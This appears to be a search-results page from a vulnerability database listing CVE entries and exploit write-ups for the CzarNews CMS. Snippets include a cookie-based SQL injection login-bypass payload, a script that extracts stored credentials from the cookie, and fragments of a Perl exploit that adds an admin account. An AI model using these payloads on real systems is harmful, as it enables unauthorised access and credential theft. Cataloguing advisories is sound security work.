47 matches found
EUVD-2006-1641
Malware in sbrugna...
EUVD-2006-3680
Malware in sbrugna...
EUVD-2008-4186
Malware in sbrugna...
EUVD-2006-1642
Malware in sbrugna...
CzarNews <= 1.20 (Account Hijacking) Remote SQL Injection Vuln
首先登陆一个CzarNews 1.20 版本的网站。 2. 打开登陆页面,然后在地址栏中输入 javascript:document.cookie="recook=' or ''=',' or ''='";void0; 随后刷新页面,接下来见证奇迹,你会惊奇的发现你处于了登陆状态。 3. 如果你输入以下代码在URL当中 javascript:c=document.cookie;p=c.substrc.lastIndexOf'='+1.split/%../;a lert"Login: " + p0 + "\nPass: " + p1;void0;...
CzarNews <= 1.14 (tpath) Remote File Inclusion Vulnerability
No description provided by source. ================================================================= CzarNews = tpath Remote File Inclusion Exploit ================================================================ | Critical Level : Dangerous | |...
CzarNews <= 1.20 (Cookie) Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl ---------------------------------------------------------- CzarNews = v1.20 Cookie Remote SQL Injection Exploit Perl Exploit - Add a new admin with your credentials! Discovered On: 15/09/2008 Discovered By: StAkeR - StAkeRathotmaildotit...
CzarNews 1.13/1.14 headlines.php Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/12857/info CzarNews is prone to a remote file-include vulnerability. An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process...
CVE-2008-4203
SQL injection vulnerability in cnusers.php in CzarNews 1.20 and earlier allows remote attackers to execute arbitrary SQL commands via a recook cookie...
Sql injection
SQL injection vulnerability in cnusers.php in CzarNews 1.20 and earlier allows remote attackers to execute arbitrary SQL commands via a recook cookie...
CVE-2008-4203
SQL injection vulnerability in cnusers.php in CzarNews 1.20 and earlier allows remote attackers to execute arbitrary SQL commands via a recook cookie...
CVE-2008-4203
CVE-2008-4203 – A SQL injection in cn_users.php in CzarNews 1.20 and earlier allows remote attackers to execute arbitrary SQL commands via a recook cookie. The vulnerability affects CzarNews versions up to 1.20; exploit details and impact are described in public databases (e.g., NVD). The connect...
CzarNews <= 1.20 (Account Hijacking) Remote SQL Injection Vuln
No description provided by source. czarNews Account Hijacking = 1.20 user and password Leak ---------------------------------------------------------- Author: Maycon Maia Vitali 0ut0fBound Contact: mayconmaia at yahoo dot com dot br http://maycon.gsec.com.br Original Xploit by StAkeR...
CzarNews <= 1.20 (Cookie) Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl ---------------------------------------------------------- CzarNews = v1.20 Cookie Remote SQL Injection Exploit Perl Exploit - Add a new admin with your credentials! Discovered On: 15/09/2008 Discovered By: StAkeR - StAkeRathotmaildotit...
CzarNews 1.20 - Account Hijacking SQL Injection
CzarNews 1.20 - Account Hijacking SQL Injection czarNews Account Hijacking = 1.20 user and password Leak ---------------------------------------------------------- Author: Maycon Maia Vitali 0ut0fBound Contact: mayconmaia at yahoo dot com dot br http://maycon.gsec.com.br Original Xploit by StAkeR...
CzarNews 1.20 - cookie SQL Injection
CzarNews 1.20 - cookie SQL Injection !/usr/bin/perl ---------------------------------------------------------- CzarNews agent"Mozilla/4.5 en Win95; U"; $https-timeout1; $https-defaultheader'Cookie' = "recook=' or '1=1,' or '1=1"; $request = $https-post$hostname."/cnusers.php", user = $username,...
czarnewsaccount-sql.txt
czarNews Account Hijacking = 1.20 user and password Leak ---------------------------------------------------------- Author: Maycon Maia Vitali 0ut0fBound Contact: mayconmaia at yahoo dot com dot br http://maycon.gsec.com.br Original Xploit by StAkeR http://www.milw0rm.com/exploits/6462 Gerenal...
czarnewscookie-sql.txt
!/usr/bin/perl ---------------------------------------------------------- CzarNews agent"Mozilla/4.5 en Win95; U"; $https-timeout1; $https-defaultheader'Cookie' = "recook=' or '1=1,' or '1=1"; $request = $https-post$hostname."/cnusers.php", user = $username, pass = $password, email = $email,...
CzarNews <= 1.20 (Cookie) Remote SQL Injection Exploit
Exploit for unknown platform in category web applications ====================================================== CzarNews agent"Mozilla/4.5 en Win95; U"; $https-timeout1; $https-defaultheader'Cookie' = "recook=' or '1=1,' or '1=1"; $request = $https-post$hostname."/cnusers.php", user = $username,...
CzarNews <= 1.20 (Account Hijacking) Remote SQL Injection Vuln
Exploit for unknown platform in category web applications ============================================================== CzarNews = 1.20 Account Hijacking Remote SQL Injection Vuln ============================================================== czarNews Account Hijacking = 1.20 user and password...